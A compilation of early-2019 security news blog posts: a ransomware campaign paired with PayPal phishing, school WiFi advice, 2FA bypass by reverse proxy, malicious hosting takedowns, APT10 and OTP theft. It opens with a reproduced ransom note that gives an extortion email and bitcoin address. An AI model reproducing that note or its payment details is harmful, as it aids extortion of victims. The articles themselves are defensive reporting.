YOUR FILES HAVE BEEN ENCRYPTED!

Dear victim:

Files have been encrypted! And Your computer has been limited!

To unlock your PC you must pay with one of the payment methods provided, we regularly check your activity of your screen and to see if you have paid. Paypal automatically sends us a notification once you’ve paid, But if it doesn’t unlock your PC upon payment contact us (CryTekk@protonmail.com)

 Reference Number: CT-{redacted}

When you pay via BTC, send us an email following your REF Number if your PC doesn’t unencrypt. Once you pay, Your PC will de decrypted. However if you don’t within 14 days we will continue to infect your PC and extract all your data and use it.

Google ‘how to buy/pay with bitcoin’ if you don’t know how. To pay by bitcoin: send $40 to your unique bitcoin address.

34ieoNtVEUpcWeVbuxUWXoyANEBBy22TUb

Clicking the yellow “Buy now” button in the small PayPal option box opens a browser tab to direct users to a phishing page asking for card details:

The first PayPal phishing page asking for card deets. (Courtesy of MalwareHunterTeam)

After supplying the information wanted and clicking the “Agree and Confirm” button, users are then directed to another phishing page asking for personal information, which they need to fill in to “confirm” their identities:

The second PayPal phishing page asking for personally identifiable information (PII). (Courtesy of MalwareHunterTeam)

After filling in all information, clicking the “Agree and Confirm” button points users to a fake confirmation that the user’s account access is fully restored, which is odd because, as far as the user knows, they were paying the ransom, not addressing a problem about their PayPal accounts. Now, if the user hadn’t already realized that they had been duped twice, at this point they might.

The fake “confirmation” page. (Courtesy of MalwareHunterTeam)

Finally, clicking the “My PayPal” button directs users to the legitimate PayPal login page.

Fool me once, shame on me. Fool me twice…

While ransomware is not as rampant today compared to two years ago, it remains a top threat to consumers and businesses alike. It wouldn’t surprise us at all if the real intent of the criminals behind this campaign is to bank on people’s fear of ransomware to go after their money and credentials.

Files encrypted by this ransomware can be decrypted, as confirmed by MHT’s own Michael Gillespie in a tweet. In fact, within two hours after the initial MHT tweet, Gillespie already offered to decrypt files for possible victims. This confirms what Bleeping Computer stated about the ransomware code being “nothing special.” This also suggests that the criminals put greater effort into the phishing side of the campaign than to the ransomware itself.

Since most, if not all, ransomware attacks ask for cryptocurrency payment, this attack differentiates itself by offering victims an alternative pay first before presenting the Bitcoin payment option. This leads us to speculate that, although they didn’t say it outright, PayPal is their preferred payment method. Also, $40 in Bitcoin in exchange for decrypting files? That’s cheap compared to the amount criminals will be getting from victims once they access their accounts using the swiped credentials.

Regardless of whether we see this as a sophisticated ransomware campaign or a “really dope” attempt at phishing, one thing is clear: They are after your money and credentials, so it pays to know when you’re being phished.

It can be frightening to find oneself face-to-face with a ransomware infection, but let us remain calm and keep our heads together. Remember that criminals want us to feel vulnerable, so be and do the opposite. Scrutinize URLs carefully before you enter your credentials or PII. If you feel that something is amiss, follow your gut and don’t proceed any further. If you think you’re stuck and don’t know what to do next, don’t be afraid to ask for help from someone online or in-person who is savvy enough to guide you.

Stay safe out there!

The post Sly criminals package ransomware with malicious ransom note appeared first on Malwarebytes Labs.

The Threat Intelligence Market Segment – A Complete Mockery and IP Theft Compromise – An Open Letter to the U.S Intelligence Community

I recently came across to the most recently published DoD Cyberspace Strategy 2018 which greatly reminded me of a variety of resources that I recently took a look at in terms of catching up with some of the latest cyber warfare trends and scenarios. Do you want to be a cyber warrior? Do you want to "hunt down the bad guys"? Watch out - Uncle Sam is there to spank the very bottom of your digital

Microsoft remains the most impersonated brand, Netflix phishing spikes

Although Microsoft remains the top target for phishers, Netflix saw an incredible surge in Dec., making it the second most impersonated brand in Q4 2018, according to Vade Secure. Microsoft remains the #1 impersonated brand, receiving more than 2.3 times the number of phishing URLs than Netflix. One credential can provide hackers with a single entry point to all of the apps under the Office 365 platform—as well as the files, data, contacts, etc. stored … More

The post Microsoft remains the most impersonated brand, Netflix phishing spikes appeared first on Help Net Security.

McAfee Blogs: How Safe is Your Child’s School WiFi?

School WiFi. For many of our digital natives, school WiFi may even be a more important part of their daily life than the canteen!! And that is saying something…

You’d be hard pressed to find a child who rocked up to school without a device in their backpack in our digital age. The vast majority of schools have embraced the many positive learning benefits that internet-connected devices offer our kids. The traditional blackboard and textbook lessons that were confined to the four walls of the classroom are gone. Instead our kids can research, discover, collaborate, create and most importantly, learn like never before.

But in order for this new learning to occur, our kids need to be internet connected. And this is where school WiFi comes into play.

Do Parents Need to Be Concerned About School WiFi?

As parents, we have a responsibility to ensure our kids are safe and not at risk – and that includes when they are using the WiFi at school. Ideally, your child’s school should have a secure WiFi network but unfortunately, that doesn’t mean that they do. School budgets are tight and top-notch secure WiFi networks are expensive, so in some cases, security maybe jeopardised.

The other factor we shouldn’t ignore is that our batch of digital natives are very tech literate. The possibility that one of them may choose to cause some mayhem to their school WiFi network should also not be ignored!!

At the end of the day, the security of a WiFi network is all about whether it has tight access controls. If it allows only approved devices and people to connect via a secure login then it is more secure than public WiFi. However, if it is open to anyone or easy for anyone to connect to it, then you need to treat it like public WiFi.

What Are the Risks?

An unsecured school WiFi network is as risky as public WiFi which, according to the Harvard Business Review, is as risky as rolling a dice,

Students and staff who use an unsecured WiFi network are at risk of receiving phishing emails, being the victim of a ransomware attack or even having their data or personal details stolen. There is also a risk that the entire school’s operations could be disrupted and possibly even closed down through a DDOS – a Denial of Service Attack.

What Can Parents Do to Ensure Their Kids Are Safe Using School WiFi?

There are several steps parents can take to minimise the risks when their offspring use school WiFi.

  1. Talk To Your School

The first thing to do is speak to your child’s school to understand exactly how secure their network is. I’d recommend asking who has access to the network, what security practices they have in place and how they manage your child’s private data.

  1. Install Security Software

Operating a device without security software is no different to leaving your front door unlocked. Installing security software on all devices, including smartphones, will provide protection against viruses, online threats, risky websites and dangerous downloads. Check out McAfee’s Total Protection security software for total peace of mind!

  1. Keep Device Software Up To Date

Software updates are commonly designed to address security issues. So ensuring ALL your devices are up to date is a relatively easy way of minimising the risk of being hacked.

  1. Schedule Regular Data Back Up

If you are the victim of a ransomware attack and your data is backed up then you won’t even have to consider paying the hefty fee to retrieve your (or your child’s) data. Backing up data regularly should be not negotiable however life can often get in the way. Why not schedule automatic backups? I personally love online backup options such as Dropbox and Google Drive however you may choose to invest in a hard drive.

  1. Public Wi-Fi Rules?

If after talking to your school, you aren’t convinced that your child’s school WiFi network is secure, then I recommend that your kids should treat it as if it was public WiFi. This means that they should NEVER conduct any financial transactions using it and never share any personal details. But the absolute best way of ensuring your child is safe using an unsecured WiFi network, is to use a Virtual Private Network (VPN). A VPN like McAfee’s Safe Connect creates an encrypted tunnel so anything that is shared over WiFi is completely safe.

As a mum of 4, I am very keen to ensure my kids are engaged with their learning. And in our digital times, this means devices and WiFi. So, let’s support our kids and their teachers in their quest for interactive, digital learning but please don’t forget to check in and ensure your kids are as safe as possible while using WiFi at school.

Take Care

Alex xx

The post How Safe is Your Child’s School WiFi? appeared first on McAfee Blogs.



McAfee Blogs

How Safe is Your Child’s School WiFi?

School WiFi. For many of our digital natives, school WiFi may even be a more important part of their daily life than the canteen!! And that is saying something…

You’d be hard pressed to find a child who rocked up to school without a device in their backpack in our digital age. The vast majority of schools have embraced the many positive learning benefits that internet-connected devices offer our kids. The traditional blackboard and textbook lessons that were confined to the four walls of the classroom are gone. Instead our kids can research, discover, collaborate, create and most importantly, learn like never before.

But in order for this new learning to occur, our kids need to be internet connected. And this is where school WiFi comes into play.

Do Parents Need to Be Concerned About School WiFi?

As parents, we have a responsibility to ensure our kids are safe and not at risk – and that includes when they are using the WiFi at school. Ideally, your child’s school should have a secure WiFi network but unfortunately, that doesn’t mean that they do. School budgets are tight and top-notch secure WiFi networks are expensive, so in some cases, security maybe jeopardised.

The other factor we shouldn’t ignore is that our batch of digital natives are very tech literate. The possibility that one of them may choose to cause some mayhem to their school WiFi network should also not be ignored!!

At the end of the day, the security of a WiFi network is all about whether it has tight access controls. If it allows only approved devices and people to connect via a secure login then it is more secure than public WiFi. However, if it is open to anyone or easy for anyone to connect to it, then you need to treat it like public WiFi.

What Are the Risks?

An unsecured school WiFi network is as risky as public WiFi which, according to the Harvard Business Review, is as risky as rolling a dice,

Students and staff who use an unsecured WiFi network are at risk of receiving phishing emails, being the victim of a ransomware attack or even having their data or personal details stolen. There is also a risk that the entire school’s operations could be disrupted and possibly even closed down through a DDOS – a Denial of Service Attack.

What Can Parents Do to Ensure Their Kids Are Safe Using School WiFi?

There are several steps parents can take to minimise the risks when their offspring use school WiFi.

  1. Talk To Your School

The first thing to do is speak to your child’s school to understand exactly how secure their network is. I’d recommend asking who has access to the network, what security practices they have in place and how they manage your child’s private data.

  1. Install Security Software

Operating a device without security software is no different to leaving your front door unlocked. Installing security software on all devices, including smartphones, will provide protection against viruses, online threats, risky websites and dangerous downloads. Check out McAfee’s Total Protection security software for total peace of mind!

  1. Keep Device Software Up To Date

Software updates are commonly designed to address security issues. So ensuring ALL your devices are up to date is a relatively easy way of minimising the risk of being hacked.

  1. Schedule Regular Data Back Up

If you are the victim of a ransomware attack and your data is backed up then you won’t even have to consider paying the hefty fee to retrieve your (or your child’s) data. Backing up data regularly should be not negotiable however life can often get in the way. Why not schedule automatic backups? I personally love online backup options such as Dropbox and Google Drive however you may choose to invest in a hard drive.

  1. Public Wi-Fi Rules?

If after talking to your school, you aren’t convinced that your child’s school WiFi network is secure, then I recommend that your kids should treat it as if it was public WiFi. This means that they should NEVER conduct any financial transactions using it and never share any personal details. But the absolute best way of ensuring your child is safe using an unsecured WiFi network, is to use a Virtual Private Network (VPN). A VPN like McAfee’s Safe Connect creates an encrypted tunnel so anything that is shared over WiFi is completely safe.

As a mum of 4, I am very keen to ensure my kids are engaged with their learning. And in our digital times, this means devices and WiFi. So, let’s support our kids and their teachers in their quest for interactive, digital learning but please don’t forget to check in and ensure your kids are as safe as possible while using WiFi at school.

Take Care

Alex xx

The post How Safe is Your Child’s School WiFi? appeared first on McAfee Blogs.

DHS Warns Federal Agencies of DNS Hijacking Attacks

The U.S. Department of Homeland Security (DHS) on Tuesday issued an emergency directive instructing federal agencies to prevent and respond to DNS hijacking attacks.

read more

Has two-factor authentication been defeated? A spotlight on 2FA’s latest challenge

Multiple news reports about the defeat of two-factor authentication (2FA) have been making rounds lately.

In November 2018, our friends at ESET discovered a purported Android battery utility tool called “Optimization Android” from a third-party app store. This app was designed to steal money from a user’s PayPal account without relying on stolen credentials. It operates by modifying a device’s Accessibility settings and enabling the use of Android’s overlay accessibility feature. This then allows a malicious accessibility service to mimic the user’s clicks to access the legitimate app and wire money to the criminal’s own PayPal address.

Long story short: This method effectively bypasses 2FA.

Then in mid-December, researchers at the Computer Emergency Response Team in Farsi (CERTFA) Lab released a report about “The Return of Charming Kitten,” a fresh slew of state-backed phishing attacks on individuals involved in sanctions against Iran and others, but focusing more on people based in the United States and Israel. State actors have found a way to fool targets into giving away their Gmail and Yahoo! 2-step verification codes.

Days after CERTFA’s report, Amnesty International broke the news that broad, targeted phishing campaigns were set against thousands of human rights defenders (HRDs), journalists, and political actors in countries throughout the Middle East and Northern Africa (MENA). The threat actors behind at least one campaign had also actively and deliberately taken steps to bypass common forms of 2FA.

A mantis lies in wait

The latest means to circumvent 2FA was made public by Polish security researcher Piotr Duszyński not long after the New Year. He called it Modlishka—the English pronunciation of the Polish word ‘mantis’—and described it as “a flexible and powerful reverse proxy that will take your phishing campaigns to the next level (with minimal effort required from your side).” It was a tool to aid penetration testers in conducting legitimate tests.

With its release, Duszyński emphasized the effectiveness and seriousness of social engineering attacks. In the wrong hands, a tool like Modlishka can be misused to create a compelling and sophisticated phishing campaign that is significantly easier to use but far more difficult to detect and avoid by users.

Overview of collected information from a simulated phishing campaign (Courtesy of Piotr Duszyński)

How Modlishka works

Modlishka sits between the legitimate website it is impersonating and the phishing website the user is seeing.

For this tool to successfully do its job—and, in turn, for the campaign to work—phishing campaign operators must first make their targets believe that they are on the website they expect to be on so that victims will enter their credentials without suspicion. Any interactions the user makes within the phishing page, including entering credentials, are passed through and recorded by Modlishka first before forwarding them to the legitimate website in real time.

This tool also prompts the user for tokens when their accounts have 2FA enabled. However, the phisher should be present to intercept the 2FA token—especially if it’s a time-based, one-time password (TOTP)—from the user and manually input it to the legitimate website themselves before it expires.

Assuming everything went smoothly, the user is then redirected to the legitimate website and successfully logged in to conclude the phishing attack. Below is a video of Modlishka in action.

Courtesy of Piotr Duszyński

How users can protect themselves

To stop Modlishka dead in its tracks, Duszyński advised the use of 2FA hardware tokens, such as Yubikey, RSA SecurID, and the Titan Security Key, that support the Universal 2nd Factor (U2F) standard. According to Matias Brutti, Director of Research and Exploitation at Okta, Push authentication can also render such campaigns less effective.

Since all the incidents we mentioned here are all phishing attempts, it still pays to know what to look out for when determining whether a website, email, text, or other communication is a phish. Never click unknown links without verifying their authenticity first. Always check the URLs in the address bar—and remember, the green padlock is no longer enough to identify whether a site is safe or not.

Furthermore, users might drop the use of SMS 2FA and opt for a stronger second form of authentication, such as an authentication app or biometrics. Make it a point to regularly review account access logs to check if someone other than yourself is attempting to gain entry to your online accounts. Avoid conducting business, especially that involving the exchange of sensitive information or documents, using your personal email. And if you can, put additional encryption in your messages by using Pretty Good Privacy (PGP). Lastly, use password managers—they not only have better memories than their humans, but they also keep you away from phishing sites by checking the URLs on the address bar before auto-populating fields.

For mobile users, avoid downloading apps from third-party stores. Better yet, avoid looking for app utilities you think will optimize your mobile device. For example, if you’re looking to extend battery life, don’t download an app. Adopt some simple steps, such as turning off GPS when you’re not using it, or using the phone in battery-saver mode.

2FA is still good to have

Adopting 2FA is well-known, popular cybersecurity advice we give to those who want to beef up the security—and consequently, the privacy—of their accounts. But it’s also a known fact that 2FA is not bulletproof, hack-proof, or the cybersecurity panacea many assume it to be.

It is true that some forms, such as SMS-based OPTs, are a lot easier to circumvent than others. It is also true that there are more than 10 known ways to defeat 2FA to date. However, this doesn’t mean that 2FA itself is broken. Using 2FA is still far better than having just a user name and password locking your account.

The defeat of certain forms of 2FA isn’t a call for total abandonment nor should it be considered as one. It signals us, the users, to explore and go for better, more advanced forms of 2FA in securing our accounts. It also forces us to re-think our habits, adapt accordingly to this change in the threat landscape, and continue to learn about the latest social engineering tactics and tricks that could target us in the environments and sites we frequent.

Stay safe!

Additional reading:

The post Has two-factor authentication been defeated? A spotlight on 2FA’s latest challenge appeared first on Malwarebytes Labs.

Cybercrime could cost companies trillions over the next five years

Companies globally could incur $5.2 trillion in additional costs and lost revenue over the next five years due to cyberattacks, as dependency on complex internet-enabled business models outpaces the ability to introduce adequate safeguards that protect critical assets, according to Accenture. Based on a survey of more than 1,700 CEOs and other C-suite executives around the globe, the report — Securing the Digital Economy: Reinventing the Internet for Trust — explores the complexities of the … More

The post Cybercrime could cost companies trillions over the next five years appeared first on Help Net Security.

Researchers analyze DDoS attacks as coordinated gang activities

In a new report, NSFOCUS introduced the IP Chain-Gang concept, in which each chain-gang is controlled by a single threat actor or a group of related threat actors and exhibit similar behavior among the various attacks conducted by the same gang. IP Gang attack-type classification against attack volume size Researchers analyzed attack types, volume, size of events, gang activities, and attack rates. By studying the historical behavior of the 80 gangs identified in the report, … More

The post Researchers analyze DDoS attacks as coordinated gang activities appeared first on Help Net Security.

Russian hacker Alexander Zhukov extradited by Bulgaria to US

Bulgaria has extradited a Russian hacker that was indicted by a US court for mounting a sophisticated hacking scheme to the United States.

According to the Russian embassy in Washington, the Russian hacker Alexander Zhukov was extradited on January 18. The Russian embassy has chosen to disclose the news on the VK social network, the Russian version of Facebook. The hacker is currently held in a jail in Brooklyn, New York.

“Employees of the Consulate General in New York will visit him in jail soon,” the embassy said.

Zhukov is accused of being involved in a sophisticated ad fraud scheme that leverages advertising and malware to compromise computer networks.

In November, law enforcement and private firms such as Google and WhiteOps took down one of the largest and most sophisticated digital ad-fraud campaign, tracked as Dubbed 3ve, that infected over 1.7 million computers to carry out advertising frauds.

The name 3ve is derived from a set of three distinct sub-operations using unique measures to avoid detection, and each of them was built around different architectures with different components.

3ve has been active since at least 2014 and experts observed a peak in its activity in 2017. It has been estimated that the campaign allowed its operators to earn more than $30 million, people involved in the ad-fraud campaign are all from Eastern Europe.

The United States Department of Justice indicted 8 individuals from Russia, Kazakhstan, and Ukraine, one of them is Zhukov.

Operators used a broad range of technique to monetize their efforts, they created fake versions of both websites and used their own botnet to simulate visitors’ activities, then offered ad spaces to advertisers, and Border Gateway Protocol hijacking for traffic redirection. Crooks also used malicious code to generate fake clicks over online ads and earn money.

Zhukov 3ve campaigns

The size of the infrastructure involved in the 3ve ad-fraud campaign is very huge, according to the experts, fraudsters infected 1.7 million computers with malware, attackers used thousands of servers and more than 10,000 counterfeit websites to impersonate legitimate web publishers.

The experts discovered that crooks used over 60,000 accounts selling ad inventory generating a record of 3 to 12 billion of daily ad bid requests.

Zhukov, aka Nastra, was arrested in Bulgaria, where he had lived since 2010, in November.

According to Kommersant newspaper, which claims to have spoken with a friend of Zhukov, the hacker stood out on the dark web for the selective way he chose his jobs, staying away from credit-card theft or child pornography.” reported the AFP.

“Zhukov was earning about $20,000 per month on his fake ad-view contracts, but was exposed after a conflict with his US client, Kommersant said.”

Pierluigi Paganini

(SecurityAffairs – Zhukov, ad fraud)

The post Russian hacker Alexander Zhukov extradited by Bulgaria to US appeared first on Security Affairs.

Hosting malicious sites on legitimate servers: How do threat actors get away with it?

How do threat actors manage to get their sites and files hosted on legitimate providers’ servers? I have asked myself this question many times, and many times thought, “The threat actors pay for it, and for some companies, money is all that matters.”

But is it really that simple? I decided to find out.

I asked some companies, as well as some of my co-workers who are involved with site takedowns on a regular basis, about their experiences.

I conversed with William Tsing who is, among others, responsible for infringements on the Malwarebytes brand; Steven Burn, our Website Protection Team Lead; and with a spokesperson of International Card Services B.V. (ICS), the company behind the well-known Visa and Mastercard credit cards. I also sent inquiries to some international banks, but as of presstime, they have not replied. On the receiving end of takedown requests, I queried providers about their methods and motives.

Background for the investigation

To give you some background on why we are involved in take-downs: Even though we protect our customers by adding malicious domains and IPs to our block lists, we also report those sites and try to get them taken offline. This does not always result in a successful takedown, but if there is a chance to protect everyone against malicious sites (and not just our clients), we will always grab the opportunity.

Let’s look at this problem from a few angles, starting with the initiators of takedowns.

Protecting your brand and your customers

Imposters can give your company an undeserved bad reputation and cause financial damages. Many financial companies are held responsible for losses due to phishing mails and fake copies of their websites. So they are generally well organized when it comes to dealing with abuse complaints. In the financial sector, one of the biggest problems is phishing mails linking to imitation sites. These imitations can be convincing, complete with green padlocks and ironic warnings about phishing.

Financial corporations in general and banks in particular are well prepared for abuse cases. Most of them have the following in place:

  • Educational pages on their site about how to recognize and deal with phishing attempts.
  • Help yourself instructions about what to do if you clicked on a link or entered your credentials on a fake site.
  • An abuse email address where customers and researchers can forward phishing mails and where you can report fake sites.
  • An abuse department that is constantly fighting to get sites taken offline that are targeting their brand(s).

The spokesperson for ICS let us know that they always attempt to take down malicious sites and are successful in about 300 cases per month, globally. In their experience, most providers are quick to take action, but sometimes differing time zones and office hours drag on the process longer than necessary.

At Malwarebytes, we also have to deal with imposters, some of which are selling our free product and others who are tech support scammers pretending to be our support department. William Tsing has had a few of these guys for breakfast, but there are some cases where it is frustrating to have fraudulent content removed. Some of our grievances are:

  • Dealing with automated bots that are impossible to convince there is something fraudulent going on.
  • No response from the provider at all.
  • A culture that would rather receives complaint about the content than from disgruntled customers who had their content removed—no matter what that content is.
GoDaddy website

This provider apparently knows what should be removed.

Hosting and other providers

As mentioned earlier, we also sent some inquiries to hosting companies and, this may not come as a surprise: the companies that actually do act upon takedown requests were the only ones that responded. The rest decided to deal with my request for information in the same way they would with a takedown request—they ignored it.

According to Steven Burn, who is responsible for the Malwarebytes block lists, this is typical behavior. In his experience, however, Western European and North American hosting companies are usually a lot more cooperative than Russian and Chinese providers.

We have asked these hosting companies what they consider malicious content, and the ones that responded agreed on the following reasons for taking sites offline:

  • Phishing content
  • Hacking content
  • Malware (as downloads)
  • Spamming

Some others also specified:

  • Illegal software and cracks
  • Inappropriate content

These providers all estimated the time between receiving a complaint and fixing the problem to be well under eight working hours. I know from experience that most are even faster. We also know that the ones that didn’t respond are more likely to deal with requests from big companies faster than those of researchers, or as they put it,” unrelated third parties.” And some may not respond at all, or worse, have an automated bot send you responses that drive you up the wall or into despair.

URL-shorteners

There are other providers at play when it comes to malicious sites. Take, for example, URL-shorteners. URL shortening services are often used by cybercriminals to obfuscate redirects to malicious destinations. So, if you’re unable to get the website itself removed because the hosting provider is unresponsive, you can try to get the URL-shortener to remove the shortened link from their redirections list. In some cases where the threat actor spread the link only in the shortened form, this could be just as effective. Most of these URL-shortening services provide excellent support, as well as detailed instructions on their site on how to proceed.

bitly abuse

Registrars

A domain name registrar is a company that manages the reservation of Internet domain names. In the chain of hosting malicious websites, they are at least as important as the company providing the physical server. A registrar can stop DNS requests for a domain to end up at the correct server. A registrar is also the player that has to enable threat actors when they use techniques like Domain Generating Algorithms (DGA). If the threat actor is unable to automatically register the domains generated by the algorithm, the entire setup of the DGA fails. Sometimes the registrar and the hosting company are the same, but this is not always the case.

Server scans

Another question I asked the providers is whether they perform scans of their servers for inactive malware or for malicious sites. Inactive malware on a server could indicate that a website is hosting malware for download. Hosted malware can be used as a payload for downloader Trojans, or it could be offered for download under the smokescreen of pretending to be a legitimate file. The providers responded that their servers are protected, but not by security software that scans for inactive malware. One provider, however, indicated that they scan newly-created sites for signs that the site could be used for malicious purposes in order to proactively set them offline.

Security researchers

Many security researchers will report their findings to interested parties. How effective they are seems to depend on how well they are connected. This is unfortunate, as requests from relatively unknown researchers can be just as legitimate as those from longtime players. Our belief is that every complaint should be taken seriously, whether it was sent to the general abuse email address or to the head of the department; whether it comes from a finance company, an antivirus vendor, or an independent botnet researcher.

Our experience with providers varies so widely that it’s hard to give general guidance. There is a provider that lets Steven Burn take sites offline himself and asks questions later. There was a provider that kept getting abused by tech support scammers, but when I pointed it out to them, they sought and found a common property in all the accounts that the threat actors registered with them. By doing so, they were able to root out all the scammers’ sites, even the ones that hadn’t been published yet. These are some examples of the ways in which we could work together to make the Internet a safer place.

But if you are a researcher or work in an abuse department, you also know the other end of the spectrum. I’m talking about the providers that would sell their grandfather for a buck or the social media giants that get so many complaints, it takes months just to get past the automated responses.

The answer to my question

In an ideal world, threat actors would have to use their own servers to host malicious sites. This would make it a lot easier for law enforcement to find out who they are and put them where they belong. Talking to some of the people that have to deal with this problem on a daily basis has more or less confirmed what I already suspected: the underlying problem for the hosting of malicious sites is about money. However, it’s perhaps a bit more nuanced than I originally believed. My revision to my original answer, then would be that two issues are at play:

  • The provider does not care where the money comes from, or how the site will be used to make more money.
  • The provider has not prioritized spending money on a functioning abuse department.

Is there anything we can do to change these attitudes? There is one way to get providers to sit up and listen. When we host our own sites, we can ask ourselves which type of provider we would rather do business with: one that takes abuse seriously, or one that turns a blind eye to cybercrime? If negligent practices turn into profit losses, it’s likely these hosting companies will take takedown requests more seriously.

Waiting for legislation that holds providers partly responsible for the content they are hosting could take a long time—or it may not even happen in some countries. It’s best, then, to take matters into your own hands. If you see something, say something. And if you own your own website now or plan to launch one in the future, look into the business practices of those hosting companies and invest in those that are taking Internet safety seriously.

Do you have takedown experiences of your own to share? Have you ever reported a malicious site to a provider? Sound off in the comments section.

The post Hosting malicious sites on legitimate servers: How do threat actors get away with it? appeared first on Malwarebytes Labs.

This Week in Security News: Risky Radio Remotes and Cybercrime

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about Trend Micro’s new research on radio frequency technology and the risks of radio remote controllers. Also, understand why there is a rise in physical crime in the cybercrime underground.

Read on:

Exclusive: Hackers Take Control Of Giant Construction Cranes

Trend Micro Research discovered that the lack of implemented security in radio frequency technology could lead to production sabotage, system control, and unauthorized access to industrial machines. 

New Magecart Attack Delivered Through Compromised Advertising Supply Chain

Trend Micro found a malicious skimming code loaded on e-commerce websites providing ticketing, touring, and flight booking services as well as self-hosted shopping cart websites. 

Tesla is Entering the Model 3 Into Pwn2Own, One of the World’s Toughest Hacking Contests

Trend Micro is partnering with Tesla to include a Model 3 sedan in Pwn2Own Vancouver this year, the first time a car has been included in the annual high-profile hacking contest.

Google Play Apps Drop Anubis Banking Malware, Use Motion-based Evasion Tactics

Trend Micro found two malicious apps, that were disguised as useful tools, on Google Play that drop wide-reaching banking malware.

As the Government Shutdown Drags On, Security Risks Intensify

Cybersecurity risks grow during the US government shutdown as organizations within the Department of Homeland Security—including the new Cybersecurity and Infrastructure Security Agency —are operating with skeleton crews.

Attacks Against Industrial Machines via Vulnerable Radio Remote Controllers: Security Analysis and Recommendations

Radio frequency technology is being used to control various industrial machines. However, the lack of implemented security could lead to production sabotage, system control, and unauthorized access.

Hackers Breach and Steal Data from South Korea’s Defense Ministry

Hackers have breached 30 computers in the South Korean government agency that oversees weapons and munitions acquisitions, stealing documents from at least ten of those computers.

The Rise of Physical Crime in the Cybercrime Underground

While underground forums have long been the purview of digital crimes, recent developments have shown signs of increasing synergy and interaction between traditional criminals and cybercrime actors. 

Firms fined $1M for SingHealth Data Security Breach

SingHealth and Singapore’s public healthcare sector IT agency IHIS have been slapped with S$250,000 and S$750,000 financial penalties, respectively, for the July 2018 cybersecurity attack that breached the country’s personal data protection act.

Are you surprised that there is rise in threat actors who delve in both traditional crime and cybercrime? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Risky Radio Remotes and Cybercrime appeared first on .

Report: Iranian APT Actors Regroup After Main Security Forum Shuts Down

Iranian state-sponsored hackers are regrouping after the shutdown last year of their main security forum, migrating to other forums and making new connections for potential cyber-response against mounting political pressures from the United States and Europe, according to a new report.

The post Report: Iranian APT Actors Regroup After Main...

Read the whole entry... »

Related Stories

The Advanced Persistent Threat files: APT10

We’ve heard a lot about Advanced Persistent Threats (APTs) over the past few years. As a refresher, APTs are prolonged, aimed attacks on specific targets with the intention to compromise their systems and gain information from or about that target. While the targets may be anyone or anything—a person, business, or other organization—APTs are often associated with government or military operations, as they tend to be the organizations with the resources necessary to conduct such an attack. Starting with Mandiant’s APT1 report in 2013, there’s been a continuous stream of exposure of nation-state hacking at scale.

Cybersecurity companies have gotten relatively good at observing and analyzing the tools and tactics of nation-state threat actors; they’re less good at placing these actions in context sufficient enough for defenders to make solid risk assessments. So we’re going to take a look at a few APT groups from a broader perspective and see how they fit into the larger threat landscape.

Today, we’re beginning with APT10. (Note: These groups have a panoply of different names, but for simplicity’s sake, we’re going to borrow Mandiant’s naming conventions for Chinese groups.)

Who is APT10?

First observed in 2009, APT10 is most commonly attributed via open source research to the Chinese Ministry of State Security (MSS). MSS attacks are typically, but not limited to: intelligence targets surrounding trade negotiations, research and development in competition with Chinese commercial entities, and high value counter intelligence targets overseas. As an example of a trade negotiation op, Fidelis Security observed a watering hole attack in February 2017 targeting members of the National Foreign Trade Council, a US trade lobby group.

A commonly-used tool of APT10 is Scanbox, which is a form of malware that can offer insights into their targeting priorities. Scanbox has been observed on assorted industrial sector targets in the US and Japan, but also on Uighur dissidents overseas. While this supports the thesis of APT10 being a government threat group, we caution defenders against associating any one piece of malware exclusively with one group. Countries maintain multiple threat groups, all of whom are fully capable of collaborating and sharing TTPs.

Malware commonly deployed

APT10 is known for deploying the following malware:

Note: Variants of PlugX and Poison Ivy were developed and deployed by Chinese state-sponsored actors. They have since been sold and resold to individual threat actors across multiple nations. At time of writing, it is inappropriate to attribute an attack to Chinese threat actors based on PlugX or Poison Ivy deployment alone.

Should you be worried?

That depends on the type of organization you run. APT10 has been observed to most commonly target construction, engineering, aerospace, and regional telecoms, as well as traditional government targets. If your company exists outside these verticals, it’s unlikely that APT10 would expend the time and resources to target you. For companies outside the targeting profile, it’s much more cost effective to spend defense budgets on common vulnerabilities that are most leveraged by common attackers.

What might they do next?

Like most APTs, APT10 has traditionally targeted at scale when attacking commercial enterprise. However, a more recent report by Price Waterhouse Cooper and BAE Systems suggests that they’ve begin devoting a portion of their operations to targeting Managed Service Providers (MSPs), most likely in an attempt to exfiltrate sensitive client data. Given that there’s been increasing awareness of advanced threats by high-value targets, continuing to target MSPs in this way is a plausible means of obtaining the same desired data at a lesser cost.

Further resources

If you’d like to do some additional reading on APTs, and specifically APT10, take a look at the following resources:

The post The Advanced Persistent Threat files: APT10 appeared first on Malwarebytes Labs.

OTP Theft on the Rise in Bengaluru; Many IT Employees Fall Victim


Numerous IT employees fall victim to a new type of OTP theft currently on the rise in Bengaluru. No culprit has been caught so far as lakhs of rupees go stolen via the utilization of this technique.

This theft stands diverse as contrasted with the rest as here, an individual calling posing like a bank employee requests from the victim to provide with them their card number and CVV so as to update or review their debit or credit card.

And the 'unsuspecting victim' does not realize that any person would at present need an OTP to complete any exchange, in this way the scamster then says the victim will get a SMS, which would need to be sent back to the sender.

And such SMSes while not containing any intelligible content obviously, are in encoded shape.  Acting like links when the victims tap on them, the incoming SMS is consequently sent to the scamster's phone, which at that point completes the cash exchange — utilizing the OTP from the victim's record.

 “The thefts were initially of relatively small amounts of ₹5,000-10,000. However, of late, larger amounts ranging from ₹50,000 to up to a few lakhs have been stolen. We have not been able to apprehend anyone yet. The victims also include several IT employees,” says a cybercrime personnel further adding that such cases came to light about 2-3 months ago.


India as a country has not taken privacy seriously. Most of the time, most hackers are able to find out the bank you are banking with,” says Harsha Halvi, co-founder of TBG Labs, “OTP theft is more a privacy matter than a technological one. Perpetrators often gain the victim’s trust by dropping a name for reference, which would make the victim trust them. After that finding information about the victim’s bank is also quite easy,” he added later.

Although Halvi later recommends that since it is not possible to build up a product\software as a safeguard against this as there are many apps that request access to SMSes, the solution to this problem will only begin to emerge if the users are increasingly mindful and don't offer authorization to get to SMSes, at that point the developers will be compelled to change their strategy.

In this way, it proposed to the users, when accepting such calls, to check with the customer care numbers of their banks in order to smoothly avoid from being entrapped in such wreckage.

Luas data ransom: the hacker who cried wolf?

In a terrible start to the year for Irish tram firm Luas, their site was compromised a week ago and adorned with a stark ransom warning:

hacked site

Click to enlarge

You are hacked. Some time ago I wrote that you have serious security holes.

